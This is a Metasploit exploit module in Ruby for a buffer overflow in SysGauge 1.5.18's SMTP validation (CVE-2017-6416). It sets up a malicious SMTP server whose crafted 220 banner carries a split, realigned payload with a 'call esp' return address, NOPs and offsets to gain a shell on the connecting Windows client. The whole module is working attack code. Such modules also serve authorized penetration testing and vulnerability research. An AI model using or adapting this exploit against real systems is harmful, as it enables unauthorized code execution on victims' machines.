Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  include Msf::Exploit::Remote::TcpServer
8

9
  Rank = NormalRanking
10

11
  def initialize()
12
    super(
13
      'Name'           => 'SysGauge SMTP Validation Buffer Overflow',
14
      'Description'    => %q{
15
        This module will setup an SMTP server expecting a connection from SysGauge 1.5.18
16
        via its SMTP server validation. The module sends a malicious response along in the
17
        220 service ready response and exploits the client, resulting in an unprivileged shell.
18
      },
19
      'Author'         =>
20
      [
21
        'Chris Higgins', # msf Module -- @ch1gg1ns
22
        'Peter Baris'    # Initial discovery and PoC
23
      ],
24
      'License'        => MSF_LICENSE,
25
      'References'     =>
26
      [
27
        [ 'CVE', '2017-6416' ],
28
        [ 'EDB', '41479' ],
29
      ],
30
      'DefaultOptions' =>
31
      {
32
        'EXITFUNC' => 'thread'
33
      },
34
      'Payload'        =>
35
      {
36
        'Space' => 306,
37
        'BadChars' => "\x00\x0a\x0d\x20"
38
      },
39
      'Platform'  => 'win',
40
      'Targets'       =>
41
      [
42
        [ 'Windows Universal',
43
          {
44
            'Offset' => 176,
45
            'Ret'    => 0x6527635E # call esp # QtGui4.dll
46
          }
47
        ]
48
      ],
49
      'Privileged'    => false,
50
      'DisclosureDate' => 'Feb 28 2017',
51
      'DefaultTarget' => 0
52
      )
53
    register_options(
54
      [
55
      OptPort.new('SRVPORT', [ true, "The local port to listen on.", 25 ]),
56
      ])
57
  end
58

59
  def on_client_connect(c)
60
    # Note here that the payload must be split into two parts.
61
    # The payload gets jumbled in the stack so we need to split
62
    # and align to get it to execute correctly.
63
    sploit =  "220 "
64
    sploit << rand_text(target['Offset'])
65
    # Can only use the last part starting from 232 bytes in
66
    sploit << payload.encoded[232..-1]
67
    sploit << rand_text(2)
68
    sploit << [target.ret].pack('V')
69
    sploit << rand_text(12)
70
    sploit << make_nops(8)
71
    # And the first part up to 232 bytes
72
    sploit << payload.encoded[0..231]
73
    sploit << "ESMTP Sendmail \r\n"
74

75
    print_status("Client connected: " + c.peerhost)
76
    print_status("Sending payload...")
77

78
    c.put(sploit)
79
  end
80
end
81

82